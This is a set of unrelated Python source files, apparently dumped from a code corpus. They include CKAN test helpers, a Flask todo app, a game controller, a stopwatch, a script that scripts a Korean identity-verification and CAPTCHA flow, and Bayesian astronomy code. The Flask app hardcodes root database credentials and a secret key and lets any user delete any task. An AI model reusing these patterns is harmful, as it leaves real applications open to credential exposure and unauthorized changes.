assert len(sequence) == count, "Length of sequence %s was not %s." % (
sequence,
count,
)
def assert_isinstance(self, object, kind):
assert isinstance(
object, kind
), "Object %s is not an instance of %s." % (object, kind)
class TestCase(CommonFixtureMethods, CheckMethods, BaseCase):
def setup(self):
super(TestCase, self).setup()
self.conditional_create_common_fixtures()
def teardown(self):
self.reuse_or_delete_common_fixtures()
super(TestCase, self).setup()
class WsgiAppCase(BaseCase):
app = helpers._get_test_app()
def config_abspath(file_path):
if os.path.isabs(file_path):
return file_path
return os.path.join(conf_dir, file_path)
class CkanServerCase(BaseCase):
@classmethod
def _recreate_ckan_server_testdata(cls, config_path):
cls._paster("db clean", config_path)
cls._paster("db init", config_path)
cls._paster("create-test-data", config_path)
cls._paster("search-index rebuild", config_path)
@staticmethod
def _start_ckan_server(config_file=None):
if not config_file:
config_file = config["__file__"]
config_path = config_abspath(config_file)
import subprocess
process = subprocess.Popen(["paster", "serve", config_path])
return process
@staticmethod
def _stop_ckan_server(process):
pid = process.pid
pid = int(pid)
if os.system("kill -9 %d" % pid):
raise Exception(
"Can't kill foreign CKAN instance (pid: %d)." % pid
)
class TestController(
CommonFixtureMethods, CkanServerCase, WsgiAppCase, BaseCase
):
def assert_equal(self, left, right):
assert left == right
def assert_not_equal(self, left, right):
assert left != right
def clear_language_setting(self):
self.app.cookies = {}
class TestSearchIndexer:
"""
Tests which use search can use this object to provide indexing
Usage:
self.tsi = TestSearchIndexer()
(create packages)
self.tsi.index()
(do searching)
"""
def __init__(self):
from ckan import plugins
if not is_search_supported():
pytest.skip("Search not supported")
plugins.load("synchronous_search")
@classmethod
def index(cls):
pass
@classmethod
def list(cls):
return [
model.Package.get(pkg_index.package_id).name
for pkg_index in model.Session.query(model.PackageSearch)
]
def setup_test_search_index():
# from ckan import plugins
if not is_search_supported():
pytest.skip("Search not supported")
search.clear_all()
# plugins.load('synchronous_search')
def is_search_supported():
is_supported_db = not model.engine_is_sqlite()
return is_supported_db
def are_foreign_keys_supported():
return not model.engine_is_sqlite()
def is_datastore_supported():
# we assume that the datastore uses the same db engine that ckan uses
is_supported_db = model.engine_is_pg()
return is_supported_db
def clear_flash(res=None):
messages = h._flash.pop_messages()
class StatusCodes:
STATUS_200_OK = 200
STATUS_201_CREATED = 201
STATUS_400_BAD_REQUEST = 400
STATUS_403_ACCESS_DENIED = 403
STATUS_404_NOT_FOUND = 404
STATUS_409_CONFLICT = 409
def call_action_api(app, action, apikey=None, status=200, **kwargs):
"""POST an HTTP request to the CKAN API and return the result.
Any additional keyword arguments that you pass to this function as **kwargs
are posted as params to the API.
Usage:
package_dict = post(app, 'package_create', apikey=apikey,
name='my_package')
assert package_dict['name'] == 'my_package'
num_followers = post(app, 'user_follower_count', id='annafan')
If you are expecting an error from the API and want to check the contents
of the error dict, you have to use the status param otherwise an exception
will be raised:
error_dict = post(app, 'group_activity_list', status=403,
id='invalid_id')
assert error_dict['message'] == 'Access Denied'
:param app: the test app to post to
:param action: the action to post to, e.g. 'package_create'
:type action: string
:param apikey: the API key to put in the Authorization header of the post
(optional, default: None)
:type apikey: string
:param status: the HTTP status code expected in the response from the CKAN
API, e.g. 403, if a different status code is received an exception will
be raised (optional, default: 200)
:type status: int
:param **kwargs: any other keyword arguments passed to this function will
be posted to the API as params
:returns: the 'result' or 'error' dictionary from the CKAN API response
:rtype: dictionary
"""
response = app.post(
"/api/action/{0}".format(action),
json=kwargs,
extra_environ={"Authorization": str(apikey)},
status=status,
)
assert (
"/api/3/action/help_show?name={0}".format(action)
in response.json["help"]
)
if status in (200,):
assert response.json["success"] is True
return response.json["result"]
else:
assert response.json["success"] is False
return response.json["error"]
| 26.985401 | 79 | 0.640339 |
4a280053f3eae39c7a31fec9a24c61660db7340b | 4,846 | py | Python | app.py | Darepapi/flask_todo_app | 742c23b0518e2563abc9dd5cffcf00fa33fe812c | [
"Unlicense",
"MIT"
] | 1 | 2020-07-22T03:01:21.000Z | 2020-07-22T03:01:21.000Z | app.py | Darepapi/flask_todo_app | 742c23b0518e2563abc9dd5cffcf00fa33fe812c | [
"Unlicense",
"MIT"
] | null | null | null | app.py | Darepapi/flask_todo_app | 742c23b0518e2563abc9dd5cffcf00fa33fe812c | [
"Unlicense",
"MIT"
] | null | null | null | from flask import Flask, render_template, request, redirect, flash, url_for, flash
from flask_mysqldb import MySQL
from werkzeug.security import generate_password_hash,check_password_hash
from flask_login import LoginManager, UserMixin, login_required, login_user, logout_user, current_user
from datetime import timedelta
#Database connection
app = Flask(__name__)
app.config['MYSQL_HOST'] = 'localhost'
app.config['MYSQL_DB'] = 'todo_db'
app.config['MYSQL_USER'] = 'root'
app.config['MYSQL_PASSWORD'] = 'root'
app.config['SECRET_KEY'] = 'thisismysecretkey'
mysql = MySQL(app)
#flask-login user class
class User(UserMixin):
def __init__(self, name, id):
self.name = name
self.id = id
login_manager = LoginManager()
login_manager.init_app(app)
login_manager.login_message = 'Please login.'
#Ask user to login if session expired already
@login_manager.unauthorized_handler
def unauthorized():
flash("Please login.")
return render_template('login.html')
@app.route("/update", methods=['POST','GET'])
def update():
cur = mysql.connection.cursor()
newTask = request.form['updated-task']
old_id = request.form["old_id"]
cur.execute('UPDATE user_task SET task=%s WHERE id=%s',[newTask,int(old_id)])
mysql.connection.commit()
return redirect(url_for("index"))
#queries the database and load user at every request
@login_manager.user_loader
def load_user(user_id):
cur = mysql.connection.cursor()
cur.execute(""" SELECT * FROM users WHERE id=%s """,[int(user_id)])
currentUser = cur.fetchone()
if currentUser:
return User(id=currentUser[0],name=currentUser[1])
else:
return
@app.route("/login", methods=["GET","POST"])
def login():
if request.method == "GET":
return render_template("login.html")
elif request.method == "POST":
cur = mysql.connection.cursor()
username = request.form['username']
password = request.form['password']
#Queries the database and check if user is registered in the database
cur.execute(""" SELECT * FROM users
WHERE name=%s""",[username])
newUser = cur.fetchone()
if newUser:
password_check = check_password_hash(newUser[2], password)
if password_check:
user = User(id=newUser[0],name=newUser[1])
login_user(user, remember=True, duration=timedelta(seconds=10))
return redirect(url_for("index"))
flash('Incorrect password! Please try again')
return render_template('login.html')
flash("Invalid username! Please try again")
return render_template('login.html')
@app.route("/signup", methods=["GET", "POST"])
def signUp():
cur = mysql.connection.cursor()
if request.method == "GET":
return render_template("signup.html")
elif request.method == "POST":
username = request.form['username']
mail = request.form['mail']
password = generate_password_hash(request.form['password'])
#confirm if user exist, if not add to database and redirect to login page
cur.execute(""" SELECT * FROM users WHERE name=%s OR email=%s """,[username, mail])
user_exist = cur.fetchall()
if user_exist:
#Username or email taken already, Prompt for another
flash("Username or mail taken already, Try again")
return redirect(url_for('signUp'))
else:
#On successful registration, user is redirected to the login page and ask to login the new details
flash("You have been registered! Kindly log in")
cur.execute(""" INSERT INTO users (name, password, email)
VALUES(%s,%s,%s) """,[username,password,mail])
mysql.connection.commit()
return redirect(url_for('login'))
@app.route("/", methods=["POST","GET"])
@login_required
def index():
if request.method == 'GET':
cur = mysql.connection.cursor()
cur.execute('SELECT id,task FROM user_task WHERE user_id=%s',[int(current_user.id)])
return render_template("index.html",tasklist=cur.fetchall())
task = request.form['newtask']
cur = mysql.connection.cursor()
cur.execute("INSERT INTO user_task(task, user_id) VALUES(%s,%s)",[task,current_user.id])
mysql.connection.commit()
return redirect(url_for('index'))
@app.route('/logout',methods=['GET'])
@login_required
def logout():
logout_user()
return redirect(url_for('login'))
@app.route("/delete/<string:task>",methods=['GET'])
@login_required
def delete(task):
cur = mysql.connection.cursor()
cur.execute('DELETE FROM user_task WHERE task=%s',[task])
mysql.connection.commit()
return redirect(url_for('index'))
if __name__ == "__main__":
app.run()
| 32.743243 | 110 | 0.657656 |
4a28006d71a4b46910ee03915c3b5797bc3b3c8c | 4,829 | py | Python | ursina/prefabs/first_person_controller.py | flipcoder/ursina | f761ccd69160d0bef5d13e7b34ca55d66d54b523 | [
"MIT"
] | null | null | null | ursina/prefabs/first_person_controller.py | flipcoder/ursina | f761ccd69160d0bef5d13e7b34ca55d66d54b523 | [
"MIT"
] | null | null | null | ursina/prefabs/first_person_controller.py | flipcoder/ursina | f761ccd69160d0bef5d13e7b34ca55d66d54b523 | [
"MIT"
] | 1 | 2020-10-03T03:44:16.000Z | 2020-10-03T03:44:16.000Z | from ursina import *
class FirstPersonController(Entity):
def __init__(self, **kwargs):
super().__init__()
self.speed = 5
self.cursor = Entity(parent=camera.ui, model='quad', color=color.pink, scale=.008, rotation_z=45)
self.position = (0, 1, 1)
camera.position = self.position
camera.rotation = (0,0,0)
camera.fov = 90
mouse.locked = True
self.mouse_sensitivity = Vec2(40, 40)
self.target_smoothing = 100
self.smoothing = self.target_smoothing
self.grounded = False
self.jump_height = 2
self.jump_duration = .5
self.jumping = False
self.air_time = 0
for key, value in kwargs.items():
setattr(self, key ,value)
def update(self):
self.rotation_y += mouse.velocity[0] * self.mouse_sensitivity[1]
camera.rotation_x -= mouse.velocity[1] * self.mouse_sensitivity[0]
camera.rotation_x = clamp(camera.rotation_x, -90, 90)
self.y += held_keys['e']
self.y -= held_keys['q']
self.direction = Vec3(
self.forward * (held_keys['w'] - held_keys['s'])
+ self.right * (held_keys['d'] - held_keys['a'])
).normalized()
self.smoothing = lerp(self.smoothing, self.target_smoothing, 4*time.dt)
camera.position = lerp(
camera.position,
self.position + (self.up*1.5),
self.smoothing / 100)
camera.rotation_y = self.rotation_y
origin = self.world_position + (self.up*.5) + (self.direction/2)
middle_ray = raycast(origin , self.direction, ignore=[self,], distance=.25, debug=False)
left_ray = raycast(origin, lerp(self.left, self.forward, .125), ignore=[self,], distance=1.4, debug=False)
right_ray = raycast(origin, lerp(self.right, self.forward, .125), ignore=[self,], distance=1.4, debug=False)
# push away from the wall
# if left_ray.hit:
# self.smoothing = 2
# self.position -= lerp(self.left, self.forward, .5) * (1.399-left_ray.distance)
#
# elif right_ray.hit:
# self.smoothing = 2
# self.position -= lerp(self.right, self.forward, .5) * (1.399-right_ray.distance)
if not middle_ray.hit:
self.position += self.direction * self.speed * time.dt
# gravity
ray = boxcast(self.world_position+(0,.05,0), self.down, ignore=(self, ), thickness=.9)
if ray.distance <= .1:
if not self.grounded:
self.land()
self.grounded = True
# self.y = ray.world_point[1]
return
else:
self.grounded = False
# if not on ground and not on way up in jump, fall
if not self.grounded:
self.y -= min(self.air_time, ray.distance-.05)
self.air_time += time.dt*.25
def input(self, key):
if key == 'space':
self.jump()
def jump(self):
if not self.grounded:
return
self.grounded = False
self.animate_y(self.y+self.jump_height, self.jump_duration, resolution=120, curve=curve.out_expo)
invoke(self.start_fall, delay=self.jump_duration)
def start_fall(self):
self.y_animator.pause()
self.jumping = False
def land(self):
# print('land')
self.air_time = 0
self.grounded = True
if __name__ == '__main__':
from ursina.prefabs.first_person_controller import FirstPersonController
# window.vsync = False
app = Ursina()
Sky(color=color.gray)
ground = Entity(model='plane', scale=(100,1,100), color=color.yellow.tint(-.2), texture='white_cube', texture_scale=(100,100), collider='box')
e = Entity(model='cube', scale=(1,5,10), x=2, y=.01, rotation_y=45, collider='box', texture='white_cube')
e.texture_scale = (e.scale_z, e.scale_y)
e = Entity(model='cube', scale=(1,5,10), x=-2, y=.01, collider='box', texture='white_cube')
e.texture_scale = (e.scale_z, e.scale_y)
player = FirstPersonController(y=1)
player.gun = None
gun = Button(parent=scene, model='cube', color=color.blue, origin_y=-.5, position=(3,0,3), collider='box')
gun.on_click = Sequence(Func(setattr, gun, 'parent', camera), Func(setattr, player, 'gun', gun))
def input(key):
if key == 'left mouse down' and player.gun:
gun.blink(color.orange)
bullet = Entity(parent=gun, model='cube', scale=.1, color=color.black)
bullet.world_parent = scene
bullet.animate_position(bullet.position+(bullet.forward*50), curve=curve.linear, duration=1)
destroy(bullet, delay=1)
# Entity(model='cube', color=color.dark_gray, scale=(9,4,9), y=-.5, collider='box')
app.run()
| 34.248227 | 146 | 0.595154 |
4a2800fafde3d27a45b0b84b7f79108c370b3dd3 | 2,223 | py | Python | stopwatch.py | sgmoratilla/genetic-drawing | 60c29b8f1fb07f24ea45941b8a8f90773ae30347 | [
"MIT"
] | 2 | 2021-02-15T00:26:37.000Z | 2022-03-06T14:01:02.000Z | stopwatch.py | sgmoratilla/genetic-drawing | 60c29b8f1fb07f24ea45941b8a8f90773ae30347 | [
"MIT"
] | null | null | null | stopwatch.py | sgmoratilla/genetic-drawing | 60c29b8f1fb07f24ea45941b8a8f90773ae30347 | [
"MIT"
] | 1 | 2021-09-28T17:45:41.000Z | 2021-09-28T17:45:41.000Z | """
MIT License
Copyright (c) 2018 Free TNT
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import time
# Ported from https://github.com/dirigeants/klasa/blob/master/src/lib/util/Stopwatch.js
class StopWatch:
def __init__(self):
self._start = time.perf_counter()
self._end = None
@property
def duration(self):
return self._end - self._start if self._end else time.perf_counter() - self._start
@property
def running(self):
return not self._end
def restart(self):
self._start = time.perf_counter()
self._end = None
return self
def reset(self):
self._start = time.perf_counter()
self._end = self._start
return self
def start(self):
if not self.running:
self._start = time.perf_counter() - self.duration
self._end = None
return self
def stop(self):
if self.running:
self._end = time.perf_counter()
return self
def __str__(self):
time = self.duration * 1000
if time >= 1000:
return "{:.2f}s".format(time / 1000)
if time >= 1:
return "{:.2f}ms".format(time)
return "{:.2f}μs".format(time * 1000)
| 32.691176 | 90 | 0.68466 |
4a2801b760511374e550ecf85d560ee10c0b00fa | 5,240 | py | Python | src/koncert/main.py | jiwonMe/k-on-cert | acf6cc608489a8af766955238678c1bff7adf7dd | [
"MIT"
] | null | null | null | src/koncert/main.py | jiwonMe/k-on-cert | acf6cc608489a8af766955238678c1bff7adf7dd | [
"MIT"
] | null | null | null | src/koncert/main.py | jiwonMe/k-on-cert | acf6cc608489a8af766955238678c1bff7adf7dd | [
"MIT"
] | null | null | null | import re
import requests
import pprint
import time
import json
from bs4 import BeautifulSoup as bs
from io import BytesIO
import base64
from requests.sessions import Session
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
class PASSAgent:
"""
PASS 본인 인증 Agent
"""
_data: dict = {}
_session: Session
_menu_id: str
_timestamp: int
def _get_menu_id(self, response: str) -> str:
"""`menuId`값 getter
주어진 response에서 `menuId` 값 64글자를 리턴합니다
Args:
response (response): requests.get/post의 응답 결과
Returns:
menu_id (str): `menuId` 값
"""
data = response.text
menu_id = re.search(
r'menuId\s{0,}=\s{0,}"([a-z\d]{64})"', data).group(1)
return menu_id
def get_data(self):
return pprint.pformat(self._data)
def __init__(self, session: Session = Session()):
self._session = session
def start(self, encode_data):
self._data.update({"encode_data": encode_data})
res = self._session.post(
"https://nice.checkplus.co.kr/CheckPlusSafeModel/service.cb", data={
"m": "checkplusSerivce",
"EncodeData": encode_data
})
self._menu_id = self._get_menu_id(res)
return res.text
def check_by_sms(self, mno, name, birth, sex, mobile_number):
"""sms 본인확인
Args:
mno (str): 통신사
name (str): 실명
birth (digit[6]): YYMMDD형식의 생년월일
sex (digit): 성별(주민등록번호 뒤 7자리 중 첫번째 숫자)
mobile_number (numbers): 휴대폰 번호(no hyphen'-')
Returns:
(str): 응답 텍스트
"""
data = {
"m": "authMobile01",
"mobileAuthType": "SMS",
"nciInfo": "",
"menuId": self._menu_id,
"mobileco": mno,
"agree": "on", # 전체 동의
"agree1": "Y", # 개인정보이용동의
"agree2": "Y", # 고유식별정보처리동의
"agree3": "Y", # 서비스이용약관동의
"agree4": "Y", # 통신사이용약관동의
}
self._data.update({
"name": name,
"birth": birth,
"sex": sex,
"mobile_number": mobile_number
})
res = self._session.post(
"https://nice.checkplus.co.kr/CheckPlusSafeModel/service.cb", data=data)
self._menu_id = self._get_menu_id(res)
# BDC_VCID_CAPTCHA 값 추출 후 저장
html = res.text
soup = bs(html, 'html.parser')
self._data.update({
"BDC_DATA": {
"BDC_VCID_CAPTCHA": soup.find(
'input', {'name': 'BDC_VCID_CAPTCHA'}).attrs['value']
}
})
return res.text
def get_captcha(self, mode="image"):
"""bot detect captcha image/sound request
Args:
mode (str, optional): [description]. Defaults to "image".
Returns:
[type]: [description]
"""
url = "https://nice.checkplus.co.kr/botdetectcaptcha"
self._timestamp = int(time.time())
# GET p
res = self._session.get(url, params={
"get": "p",
"c": "CAPTCHA",
"t": self._data
.get("BDC_DATA")
.get("BDC_VCID_CAPTCHA"),
"d": self._timestamp
})
p_data = json.loads(res.text) # p_data dictionary로 변환
self._data.get("BDC_DATA").update({
"BDC_Hs_CAPTCHA": p_data.get("hs"),
"BDC_SP_CAPTCHA": p_data.get("sp"),
})
# GET image/sound
res = self._session.get(url, params={
"get": mode, # image or sound
"c": "CAPTCHA",
"t": self._data
.get("BDC_DATA")
.get("BDC_VCID_CAPTCHA"),
"d": self._timestamp
})
# base64 encoded image
image = BytesIO(res.content).read()
b64image = base64.b64encode(image)
return b64image
def check_captcha(self, answer: str):
"""CAPTCHA validation request
Args:
answer (str): [description]
"""
url = "https://nice.checkplus.co.kr/botdetectcaptcha"
res = self._session.get(url, params={
"get": "validation-result",
"c": "CAPTCHA",
"t": self._data
.get("BDC_DATA")
.get("BDC_VCID_CAPTCHA"),
"d": time, # TODO modify
"i": answer
})
is_success = (lambda x: x == "true")
if(is_success(res.text)):
res = self._session.post(url, data={
"m": "authMobile01Proc",
"authType": "SMS",
"menuId": self._menu_id,
"username": "",
"mynum1": "",
"mynum2": "",
"mobileno": "",
"BDC_VCID_CAPTCHA": "",
"BDC_BackWorkaround_CAPTCHA": "1",
"BDC_Hs_CAPTCHA": "",
"BDC_SP_CAPTCHA": "",
"answer": answer
})
def request_auth(self, type: str = "sms"):
pass
def check_auth(self, auth_number: str):
pass
| 26.464646 | 84 | 0.50458 |
4a2801d6dbbd6d520597c7493205f3fbe945b789 | 1,484 | py | Python | pyds8k/resources/ds8k/v1/lss.py | IBM/pyds8k | fb58f270e1ca8377ae0877a1f351cc222a937b49 | [
"Apache-2.0"
] | 7 | 2020-04-16T11:20:02.000Z | 2021-04-21T13:39:14.000Z | pyds8k/resources/ds8k/v1/lss.py | IBM/pyds8k | fb58f270e1ca8377ae0877a1f351cc222a937b49 | [
"Apache-2.0"
] | 1 | 2020-07-15T02:56:56.000Z | 2020-08-03T17:16:53.000Z | pyds8k/resources/ds8k/v1/lss.py | IBM/pyds8k | fb58f270e1ca8377ae0877a1f351cc222a937b49 | [
"Apache-2.0"
] | 6 | 2020-01-03T05:54:26.000Z | 2022-03-31T09:42:27.000Z | ##############################################################################
# Copyright 2019 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##############################################################################
"""
LSS interface.
"""
import six
from pyds8k.base import ManagerMeta, ResourceMeta
from .common.types import DS8K_LSS, DS8K_VOLUME
from .common.base import Base, ReadOnlyManager
from .common.mixins import VolumeMixin
@six.add_metaclass(ResourceMeta)
class LSS(VolumeMixin, Base):
resource_type = DS8K_LSS
# id_field = 'id'
_template = {'id': '',
'type': '',
'group': '',
'addrgrp': '',
'configvols': '',
DS8K_VOLUME: '',
}
related_resources_collection = (DS8K_VOLUME, )
@six.add_metaclass(ManagerMeta)
class LSSManager(ReadOnlyManager):
"""
Manage LSS resources.
"""
resource_class = LSS
resource_type = DS8K_LSS
| 30.916667 | 78 | 0.602426 |
4a28024edb5f5bc4ec2aad092817a9f2dc0fa4ea | 1,778 | py | Python | instapy_cli/__main__.py | MacherIT/pybuho | a0ceffe4bb5cf3d2e3ec1f32a39aafdb9601a952 | [
"MIT"
] | null | null | null | instapy_cli/__main__.py | MacherIT/pybuho | a0ceffe4bb5cf3d2e3ec1f32a39aafdb9601a952 | [
"MIT"
] | null | null | null | instapy_cli/__main__.py | MacherIT/pybuho | a0ceffe4bb5cf3d2e3ec1f32a39aafdb9601a952 | [
"MIT"
] | null | null | null | import sys
from platform import python_version
from instapy_cli.cli import InstapyCli as client
from optparse import OptionParser
import pkg_resources # part of setuptools
version = pkg_resources.require('instapy_cli')[0].version
'''
TODO:
- use instapy_cli.media to download image link and use it for upload and configure_photo
- rewrite main to support file and links for media
'''
def main(args=None):
welcome_msg = 'instapy-cli'
print('instapy ' + version + ' | python ' + python_version())
# cli = client()
# cli.loop(args)
parser = OptionParser(usage="usage: %prog [options]")
parser.add_option('-u', dest='username', help='username')
parser.add_option('-p', dest='password', help='password')
parser.add_option('-f', dest='file', help='file path or url')
parser.add_option('-t', dest='caption', help='caption text')
# parser.add_option('-h', dest='help', help='help')
(options, args) = parser.parse_args(args)
if args is None or (
not options.username and
not options.password and
not options.file and
not options.caption
):
print('[USE] instapy -u USR -p PSW -f FILE/LINK -t \'TEXT CAPTION\'')
print('\nFor other reference go to >> https://github.com/b3nab/instapy-cli')
return
if not options.username:
parser.error('Username is required')
password = options.password
if not options.password:
import getpass
password = getpass.getpass()
if not options.file:
parser.error('File path or url link is required to create a media to upload')
with client(options.username, password) as cli:
text = options.caption or ''
return cli.upload(options.file, text)
if __name__ == '__main__':
main()
| 33.54717 | 88 | 0.666479 |
4a2802fcb82074da25c63c8f17ecc70356df3da9 | 10,278 | py | Python | astropath/bayesian.py | FRBs/path | 9a8d50a9f7c6f48167e5fde06c0b0d1eb6784757 | [
"BSD-3-Clause"
] | null | null | null | astropath/bayesian.py | FRBs/path | 9a8d50a9f7c6f48167e5fde06c0b0d1eb6784757 | [
"BSD-3-Clause"
] | null | null | null | astropath/bayesian.py | FRBs/path | 9a8d50a9f7c6f48167e5fde06c0b0d1eb6784757 | [
"BSD-3-Clause"
] | null | null | null | """Methods related to Bayesian association analysis"""
import warnings
from typing import IO
import numpy as np
from astropy import units
from astropath import localization
from IPython import embed
sqarcsec_steradians = 4 * np.pi * (1 / 3600 / 3600) / (180. / np.pi) ** 2
def pw_Oi(theta, phi, theta_prior):
"""
Calculate p(w|O_i) for a given galaxy
Must integrate to 1 when integrating over w
Args:
theta (np.ndarray):
offset from galaxy center in arcsec
phi (float):
Angular size of the galaxy in arcsec
theta_prior (dict):
Parameters for theta prior
Three methods are currently supported: core, uniform, exp
See docs for further details
Returns:
np.ndarray: Probability values without grid-size normalization
"""
p = np.zeros_like(theta)
ok_w = theta < theta_prior['max']*phi
if theta_prior['PDF'] == 'core':
# Wolfram
norm = 2 * np.pi * phi**2 * (theta_prior['max']/phi - np.log(theta_prior['max']/phi+1))
#norm = phi * np.log(theta_prior['max']/phi+1)
if np.any(ok_w):
p[ok_w] = phi / (theta[ok_w] + phi) / norm
elif theta_prior['PDF'] == 'uniform':
norm = np.pi * (phi*theta_prior['max'])**2
if np.any(ok_w):
p[ok_w] = 1. / norm
elif theta_prior['PDF'] == 'exp':
# Wolfram
#norm = phi - np.exp(-scale_half*theta_prior['max']/phi) * (scale_half*theta_prior['max'] + phi)
phi = phi * theta_prior['scale']
norm = 2 * np.pi * phi**2 * (1 - (1+theta_prior['max']/phi)*np.exp(
-theta_prior['max']/phi))
if np.any(ok_w):
p[ok_w] = np.exp(-theta[ok_w]/phi) / norm
else:
raise IOError("Bad theta PDF")
#
if norm == 0:
raise ValueError("You forgot to normalize!")
# Return
return p
def px_Oi_fixedgrid(box_hwidth, localiz, cand_coords,
cand_ang_size, theta_prior, step_size=0.1,
return_grids=False):
"""
Calculate p(x|O_i), the primary piece of the analysis
Main concept:
1. Set an area to analyze
2. Discretize it to the step-size (e.g. 0.1")
3. Convolve the localization with the galaxy offset function
Args:
box_hwidth (float):
Half-width of the analysis box, in arcsec
localiz (dict):
Defines the localization
Used to calculate L(x-w)
cand_coords (SkyCoord):
Coordinates of the candidate host centroids of O_i
cand_ang_size (np.ndarray):
Angular sizes of the candidates
theta_prior (dict):
Parameters for theta prior
step_size (float, optional):
Step size for grid, in arcsec
return_grids (bool, optional):
if True, return the calculation grid
Returns:
np.ndarray or tuple: p(x|O_i) values and the grids if return_grids = True
"""
# Checks
if 'center_coord' not in localiz.keys():
#
raise IOError("To use this method, you need to specfic a center for the fixed grid via center_coord in localiz")
# Set Equinox (for spherical offsets)
localiz['center_coord'].equinox = cand_coords[0].equinox
# Build the fixed grid around the transient
ngrid = int(np.round(2*box_hwidth / step_size))
x = np.linspace(-box_hwidth, box_hwidth, ngrid)
xcoord, ycoord = np.meshgrid(x,x)
# Grid spacing
grid_spacing_arcsec = x[1]-x[0]
# #####################
# L(w-x) -- 2D Gaussian, normalized to 1 when integrating over x not omega
# Approximate as flat sky
# Warning: RA increases in x for these grids!!
ra = localiz['center_coord'].ra.deg + \
xcoord/3600. / np.cos(localiz['center_coord'].dec).value
dec = localiz['center_coord'].dec.deg + ycoord/3600.
L_wx = localization.calc_LWx(ra, dec, localiz)
p_xOis, grids = [], []
# TODO -- multiprocess this
for icand, cand_coord in enumerate(cand_coords):
# Offsets from the transient (approximate + flat sky)
theta = 3600*np.sqrt(np.cos(cand_coord.dec).value**2 * (
ra-cand_coord.ra.deg)**2 + (dec-cand_coord.dec.deg)**2) # arc sec
# p(w|O_i)
p_wOi = pw_Oi(theta,
cand_ang_size[icand], # phi
theta_prior)
# Product
grid_p = L_wx * p_wOi
# Save grids if returning
if return_grids:
grids.append(grid_p.copy())
# Sum
p_xOis.append(np.sum(grid_p)*grid_spacing_arcsec**2)
# Return
if return_grids:
return np.array(p_xOis), grids
else:
return np.array(p_xOis)
def px_Oi_local(localiz, cand_coords, cand_ang_size,
theta_prior, step_size=0.1, debug = False):
"""
Args:
localiz (dict):
Defines the localization
Used to calculate L(x-w)
See localization.py for the Data model
cand_coords (astropy.coordinates.SkyCoord):
SkyCoord object for the candidate galaxies
cand_ang_size (np.ndarray):
Angular sizes of the candidates
theta_prior (dict):
Contains information related to the offset function
This includes the angular size "ang_size" in units of arcsec
here referred to as phi.
step_size (float, optional):
Step size of the galaxy grid scaled by phi
debug (bool, optional):
If true, hit an embed in the main loop
Returns:
np.ndarray or tuple: p(x|O_i) values and the grids if return_grids = True
"""
# Loop on galaxies
p_xOis = []
for icand, cand_coord in enumerate(cand_coords):
# Prep
phi_cand = cand_ang_size[icand] # arcsec
step_size_phi = phi_cand * step_size # arcsec
box_hwidth = phi_cand * theta_prior['max'] # arcsec
# Grid around the galaxy
ngrid = int(np.round(2 * box_hwidth / step_size_phi))
x = np.linspace(-box_hwidth, box_hwidth, ngrid)
xcoord, ycoord = np.meshgrid(x,x)
theta = np.sqrt(xcoord**2 + ycoord**2)
# p(w|O)
p_wOi = pw_Oi(theta, phi_cand, theta_prior)
# Generate coords for transient localiation (flat sky)
ra = cand_coord.ra.deg + \
xcoord/3600. / np.cos(cand_coord.dec).value
dec = cand_coord.dec.deg + ycoord/3600.
# Calculate
L_wx = localization.calc_LWx(ra, dec, localiz)
# Finish
grid_p = L_wx * p_wOi
#
p_xOis.append(np.sum(grid_p)*step_size_phi**2)
# Debug
if debug:
embed(header='207 of bayesian.py')
# Return
return np.array(p_xOis)
def px_U(box_hwidth):
"""
Args:
box_hwidth (float):
Half-width of the analysis box, in arcsec
Returns:
float: p(x|U)
"""
box_sqarcsec = (2*box_hwidth)**2
#box_steradians = box_sqarcsec * sqarcsec_steradians
#
return 1./box_sqarcsec # box_steradians
def px_Oi_orig(box_hwidth, center_coord, eellipse, cand_coords,
theta_prior, step_size=-1.1, return_grids=False):
"""
DEPRECATED!
Calculate p(x|O_i), the primary piece of the analysis
Main concept:
0. Set an area to analyze
1. Discretize it to the step-size (e.g. 0.1")
2. Convolve the localization with the galaxy offset function
Args:
box_hwidth (float):
Half-width of the analysis box, in arcsec
center_coord (SkyCoord):
Observed position of the transient (x)
eellipse (dict):
Error ellipse for the transient
a, b in arcsec, theta (PA) in deg
This defines L(x-w)
cand_coords (SkyCoord):
Coordinates of the candidate host centroids of O_i
theta_prior (dict):
Parameters for theta prior
step_size (float, optional):
Step size for grid, in arcsec
return_grids (bool, optional):
if True, return the calcualtion grid
Returns:
np.ndarray or tuple: p(x|O_i) values and the grids if return_grids = True
"""
warnings.warn(DeprecationWarning)
# Error ellipse
pa_ee = eellipse['theta'] # PA of transient error ellipse on the sky; deg
dtheta = 89. - pa_ee # Rotation to place the semi-major axis "a" of the ellipse along the x-axis we define
# Set Equinox (for spherical offsets)
center_coord.equinox = cand_coords[-1].equinox
#
ngrid = int(np.round(1*box_hwidth / step_size))
x = np.linspace(-box_hwidth, box_hwidth, ngrid)
xcoord, ycoord = np.meshgrid(x,x)
# Grid spacing
grid_spacing_arcsec = x[0]-x[0]
#grid_spacing_steradian = sqarcsec_steradians * grid_spacing_arcsec**1
# #####################
# Build the grid around the transient (orient semi-major axis "a" on our x axis)
